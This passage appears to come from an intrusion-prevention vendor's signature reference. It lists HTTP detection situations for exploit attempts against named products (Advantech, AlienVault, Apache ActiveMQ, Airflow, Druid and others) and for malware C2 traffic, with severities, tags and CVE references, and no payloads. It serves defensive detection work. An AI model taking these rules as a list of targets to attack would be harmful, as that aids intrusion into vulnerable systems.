First detected in: sgpkg-ips-779-5211
Last changed: sgpkg-ips-779-5211
Vulnerability: Advantech-WebAccess-Soap-Request-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-WebAccess-Updatetemplate.aspx-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-844-5242
Last changed: sgpkg-ips-844-5242
Vulnerability: Advantech-WebAccess-Updatetemplate.aspx-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-WISE-PaaS-RMM-Accountmgmt-Activateaccount-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Advantech WISE-PaaS/RMM detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WISE-PaaS RMM, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1212-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Advantech-WISE-PaaS-RMM-Accountmgmt-Activateaccount-External-Entity-Injection
Description:
Back to top

HTTP_CRL-Advantech-WISE-PaaS-RMM-DeviceMgmt-fuzzySearch-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech WISE-PaaS/RMM detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WISE-PaaS RMM, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1220-5242
Last changed: sgpkg-ips-1220-5242
Vulnerability: Advantech-WISE-PaaS-RMM-DeviceMgmt-fuzzySearch-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-WISE-PaaS-RMM-Recoverymgmt-Checkschname-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Advantech WISE-PaaS/RMM detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WISE-PaaS RMM, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1210-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Advantech-WISE-PaaS-RMM-Recoverymgmt-Checkschname-External-Entity-Injection
Description:
Back to top

HTTP_CRL-Advantech-WISE-PaaS-RMM-SQLMgmt-getTableInfo-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech WISE-PaaS/RMM detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WISE-PaaS RMM, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1211-5242
Last changed: sgpkg-ips-1212-5242
Vulnerability: Advantech-WISE-PaaS-RMM-SQLMgmt-getTableInfo-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-WISE-PaaS-RMM-Upgrademgmt-Upload_ota-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Advantech WISE-PaaS/RMM detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WISE-PaaS RMM, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1215-5242
Last changed: sgpkg-ips-1215-5242
Vulnerability: Advantech-WISE-PaaS-RMM-Upgrademgmt-Upload_ota-Arbitrary-File-Upload
Description:
Back to top

HTTP_CRL-Advantech-WISE-PaaS-RMM-Wechatsignin-Wechattokenlogin-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Advantech WISE-PaaS/RMM detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WISE-PaaS RMM, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1222-5242
Last changed: sgpkg-ips-1222-5242
Vulnerability: Advantech-WISE-PaaS-RMM-Wechatsignin-Wechattokenlogin-External-Entity-Injection
Description:
Back to top

HTTP_CRL-Advantive-VeraCore-PmSess1-SQL-Injection-CVE-2025-25181

About this situation: An attempt to exploit a vulnerability in Advantive VeraCore detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantive VeraCore, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Vulnerability: Advantive-VeraCore-PmSess1-SQL-Injection-CVE-2025-25181
Description:
Back to top

HTTP_CRL-Adware-Toolbarcc

About this situation: Adware ToolbarCC traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, ToolbarCC, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Adware-Toolbarcc
Description:
Back to top

HTTP_CRL-Aerohive-NetConfig-LFI-And-Log-Poisoning-To-RCE

About this situation: An attempt to exploit a vulnerability in Aerohive NetConfig detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Aerohive NetConfig, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1421-5242
Last changed: sgpkg-ips-1421-5242
Vulnerability: Aerohive-NetConfig-LFI-And-Log-Poisoning-To-RCE
Description:
Back to top

HTTP_CRL-Agent-Tesla-C2-Traffic

About this situation: Agent Tesla C2 traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1089-5242
Last changed: sgpkg-ips-1089-5242
Vulnerability: Agent-Tesla-C2-Traffic
Description:
Back to top

HTTP_CRL-Aglimpse-Cgi-System-Compromise

About this situation: Vulnerable aglimpse script accessed
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WebGlimpse, CVE1999, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-506-5211
Vulnerability: HTTP-Aglimpse-Cgi-System-Compromise
Description:
Back to top

HTTP_CRL-AJ-Report-Potential-Authentication-Bypass-CVE-2024-7314

About this situation: An attempt to exploit a vulnerability in AJ-Report detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, AJ-Report, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Vulnerability: AJ-Report-Authentication-Bypass-CVE-2024-7314
Description:
Back to top

HTTP_CRL-AJ-Report-Remote-Code-Execution-CVE-2024-7314

About this situation: An attempt to exploit a vulnerability in AJ-Report detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, AJ-Report, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Vulnerability: AJ-Report-Authentication-Bypass-CVE-2024-7314
Description:
Back to top

HTTP_CRL-AjaxPro-Deserialization-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in AjaxPro detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, AjaxPro, CVE2021, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Vulnerability: AjaxPro-Deserialization-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Ajenti-Auth-Username-Command-Injection

About this situation: An attempt to exploit a vulnerability in Ajenti detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ajenti, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1213-5242
Vulnerability: Ajenti-Auth-Username-Command-Injection
Description:
Back to top

HTTP_CRL-Alibaba-Command-Execution

About this situation: Alibaba command execution vulnerability detect
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, x86, Computer Software Manufaktur Alibaba, CVE1999, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-333-4219
Vulnerability: HTTP-Alibaba-Remote-Command-Execution-Vulnerability
Description:
Back to top

HTTP_CRL-Alibaba-Command-Execution-2

About this situation: Alibaba command execution vulnerability detect
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, x86, Computer Software Manufaktur Alibaba, CVE1999, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-333-4219
Last changed: sgpkg-ips-333-4219
Vulnerability: HTTP-Alibaba-Remote-Command-Execution-Vulnerability
Description:
Back to top

HTTP_CRL-Alienvault-Ossim-Arbitrary-Command-Injection

About this situation: An attempt to exploit a vulnerability in AlienVault OSSIM detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, AlienVault AlienVault, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-870-5242
Vulnerability: Alienvault-Ossim-Arbitrary-Command-Injection
Description:
Back to top

HTTP_CRL-Alienvault-Unified-Security-Management-And-Ossim-Gauge.php-SQL-Injection

About this situation: An attempt to exploit a vulnerability in AlienVault OSSIM detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, AlienVault Unified Security Management, AlienVault OSSIM, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-820-5242
Last changed: sgpkg-ips-1013-5242
Vulnerability: Alienvault-Unified-Security-Management-And-Ossim-Gauge.php-SQL-Injection
Description:
Back to top

HTTP_CRL-Alienvault-USM/OSSIM-Unauthenticated-Command-Injection

About this situation: An Alienvault USM/OSSIM Unauthenticated Command Injection vulnerability detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, AlienVault Unified Security Management, AlienVault OSSIM, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-932-5242
Last changed: sgpkg-ips-932-5242
Vulnerability: Alienvault-USM/OSSIM-Unauthenticated-Command-Injection
Description:
Back to top

HTTP_CRL-Alienvault-USM/OSSIM-Unauthenticated-Command-Injection-2

About this situation: An Alienvault USM/OSSIM Unauthenticated Command Injection vulnerability detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, AlienVault Unified Security Management, AlienVault OSSIM, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1060-5242
Vulnerability: Alienvault-USM/OSSIM-Unauthenticated-Command-Injection
Description:
Back to top

HTTP_CRL-Allegra-Ganttandschexportaction-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Allegra Allegra detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Allegra, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1706-5242
Last changed: sgpkg-ips-1706-5242
Vulnerability: Allegra-Ganttandschexportaction-Directory-Traversal
Description:
Back to top

HTTP_CRL-Allegra-Getfilecontentasstring-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Allegra detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Allegra, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1708-5242
Last changed: sgpkg-ips-1708-5242
Vulnerability: Allegra-Getfilecontentasstring-Directory-Traversal
Description:
Back to top

HTTP_CRL-Alt-N-MDaeamon-Buffer-Overflow-Vulnerability

About this situation: An attempt to exploit a vulnerability in Alt-N MDaeamon was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Alt-N MDaeamon, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Alt-N-MDaeamon-Buffer-Overflow-Vulnerability
Description:
Back to top

HTTP_CRL-Alt-N-Technologies-SecurityGateway-Usename-BOF

About this situation: Buffer overflow allows remote code execution
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Alt-N SecurityGateway, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1589-5242
Vulnerability: Alt-N-Technologies-SecurityGateway-Usename-BOF
Description:
Back to top

HTTP_CRL-Alt-N-WebAdmin-User-Parameter-BOF

About this situation: Attempt to exploit a buffer overlow in Alt-N WebAdmin
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Alt-N WebAdmin, CVE2003, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-340-4219
Last changed: sgpkg-ips-665-5211
Vulnerability: Alt-N-WebAdmin-User-Parameter-BOF
Description:
Back to top

HTTP_CRL-Amadey-Bot-Infection-Traffic

About this situation: Amadey Bot infection traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1276-5242
Last changed: sgpkg-ips-1276-5242
Vulnerability: HTTP_CRL-Amadey-Bot-Infection-Traffic
Description:
Back to top

HTTP_CRL-Android-Gingermaster-Traffic

About this situation: Android GingerMaster traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Android, Any Hardware, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Android-Gingermaster
Description:
Back to top

HTTP_CRL-AntiBoard-SQL-Injection-CVE-2004-2062

About this situation: An attempt to exploit a vulnerability in AntiBoard detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-1013-5242
Description:
Back to top

HTTP_CRL-Apache-Activemq-Authenticated-Arbitrary-Code-Execution-CVE-2022-41678

About this situation: An attempt to exploit a vulnerability in Apache ActiveMQ detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache ActiveMQ, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Vulnerability: Apache-Activemq-Authenticated-Arbitrary-Code-Execution-CVE-2022-41678
Description:
Back to top

HTTP_CRL-Apache-Activemq-Fileserver-File-Upload-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation ActiveMQ detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache ActiveMQ, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-774-5211
Vulnerability: Apache-Activemq-Fileserver-File-Upload-Directory-Traversal
Description:
Back to top

HTTP_CRL-Apache-Activemq-Web-Console-Message.jsp-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation ActiveMQ detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache ActiveMQ, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1322-5242
Last changed: sgpkg-ips-1322-5242
Vulnerability: Apache-Activemq-Web-Console-Message.jsp-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Apache-Activemq-Web-Console-Queuefilter-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation ActiveMQ detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache ActiveMQ, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1119-5242
Vulnerability: Apache-Activemq-Web-Console-Queuefilter-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Apache-Airflow-Dag-OS-Command-Injection

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Airflow detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Airflow, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1451-5242
Last changed: sgpkg-ips-1451-5242
Vulnerability: Apache-Airflow-Dag-OS-Command-Injection
Description:
Back to top

HTTP_CRL-Apache-Airflow-Dag-Run_Id-Command-Injection

About this situation: An attempt to exploit a vulnerability in Apache Airflow detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Airflow, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1532-5242
Vulnerability: Apache-Airflow-Dag-Run_Id-Command-Injection
Description:
Back to top

HTTP_CRL-Apache-Airflow-Origin-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Apache Airflow detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Linux, Any Hardware, Apache Airflow, CVE2020, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1288-5242
Last changed: sgpkg-ips-1288-5242
Vulnerability: Apache-Airflow-Origin-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Apache-APISIX-Batch-Requests-Plugin-IP-Restriction-Bypass

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation APISIX detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache APISIX, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1448-5242
Last changed: sgpkg-ips-1589-5242
Vulnerability: Apache-APISIX-Batch-Requests-Plugin-IP-Restriction-Bypass
Description:
Back to top

HTTP_CRL-Apache-Axis2-Default-Credentials

About this situation: An attempt to login with default credentils to Apache Axis2 server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Universal CMDB Server, CA ARCserve D2D, CVE2010, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-1406-5242
Vulnerability: HP-Universal-CMDB-Server-Axis2-Default-Credentials
CA-ARCserve-D2D-Axis2-Default-Credentials
HP-Universal-CMDB-Default-Credentials-Arbitrary-File-Upload
Description:
Back to top

HTTP_CRL-Apache-Camel-Filter-Bypass-CVE-2025-29891

About this situation: An attempt to exploit a vulnerability in Apache Camel detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Camel, CVE2025, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1849-5242
Last changed: sgpkg-ips-1849-5242
Vulnerability: Apache-Camel-Filter-Bypass-CVE-2025-29891
Description:
Back to top

HTTP_CRL-Apache-Cloudstack-Saml-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation CloudStack detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache CloudStack, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1766-5242
Last changed: sgpkg-ips-1766-5242
Vulnerability: Apache-Cloudstack-Saml-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Apache-Commons-Text-Remote-Code-Execution-CVE-2022-42889

About this situation: An attempt to exploit a vulnerability in Apache Commons Text detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Commons Text, CVE2022, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1517-5242
Last changed: sgpkg-ips-1518-5242
Vulnerability: Apache-Commons-Text-Remote-Code-Execution-CVE-2022-42889
Description:
Back to top

HTTP_CRL-Apache-Continuum-Command-Injection

About this situation: An attempt to exploit an Apache Continuum Command Injection vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Apache Continuum, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-774-5211
Vulnerability: Apache-Continuum-Command-Injection
Description:
Back to top

HTTP_CRL-Apache-Couchdb-Config-Command-Execution-CVE-2018-8007

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Couchdb detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation CouchDB, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1088-5242
Last changed: sgpkg-ips-1088-5242
Vulnerability: Apache-Couchdb-Config-Command-Execution-CVE-2018-8007
Description:
Back to top

HTTP_CRL-Apache-Cxf-Services-Stylesheetpath-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation CXF detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation CXF, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1304-5242
Last changed: sgpkg-ips-1304-5242
Vulnerability: Apache-Cxf-Services-Stylesheetpath-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Apache-Druid-Javascriptdimfilter-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Druid detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Druid, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1646-5242
Vulnerability: Apache-Druid-Javascriptdimfilter-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Apache-Druid-JDBC-Connection-Properties-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Druid detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Druid, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1340-5242
Vulnerability: Apache-Druid-JDBC-Connection-Properties-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Apache-Druid-JNDI-Injection-RCE

About this situation: An attempt to exploit a vulnerability in Apache Druid detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Linux, Any Hardware, Apache Druid, CVE2023, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Vulnerability: Apache-Druid-JNDI-Injection-RCE
Description:
Back to top

HTTP_CRL-Apache-Flink-CVE-2020-17519

About this situation: An attempt to exploit a vulnerability in Apache Flink detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Flink, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1317-5242
Vulnerability: Apache-Flink-CVE-2020-17519
Description:
Back to top

HTTP_CRL-Apache-Flink-JAR-Upload-Java-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apache Flink detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Linux, Any Hardware, Apache Flink, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Vulnerability: Apache-Flink-JAR-Upload-Java-Code-Execution
Description:
Back to top

HTTP_CRL-Apache-Httpd-Mod_Cgi-Handler-Confusion

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache2, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1786-5242
Last changed: sgpkg-ips-1786-5242
Vulnerability: Apache-Httpd-Mod_Cgi-Handler-Confusion
Description:
Back to top

HTTP_CRL-Apache-Httpd-Mod_Proxy-Unix-Socket-Path-Handling-Server-Side-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation httpd detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation httpd, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Vulnerability: Apache-Httpd-Mod_Proxy-Unix-Socket-Path-Handling-Server-Side-Request-Forgery
Description:
Back to top

HTTP_CRL-Apache-Hugegraph-CVE-2024-27348-Suspicious-String-In-Gremlin-Query

About this situation: An attempt to exploit a vulnerability in Apache HugeGraph detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache HugeGraph, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1757-5242
Last changed: sgpkg-ips-1757-5242
Vulnerability: Apache-Hugegraph-Gremlin-Code-Injection-CVE-2024-27348
Description:
Back to top

HTTP_CRL-Apache-Hugegraph-Gremlin-Code-Injection-CVE-2024-27348

About this situation: An attempt to exploit a vulnerability in Apache HugeGraph detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache HugeGraph, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1757-5242
Last changed: sgpkg-ips-1757-5242
Vulnerability: Apache-Hugegraph-Gremlin-Code-Injection-CVE-2024-27348
Description:
Back to top

HTTP_CRL-Apache-Jetspeed-Pagemanagementservice-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Jetspeed detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Apache Jetspeed, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-751-5211
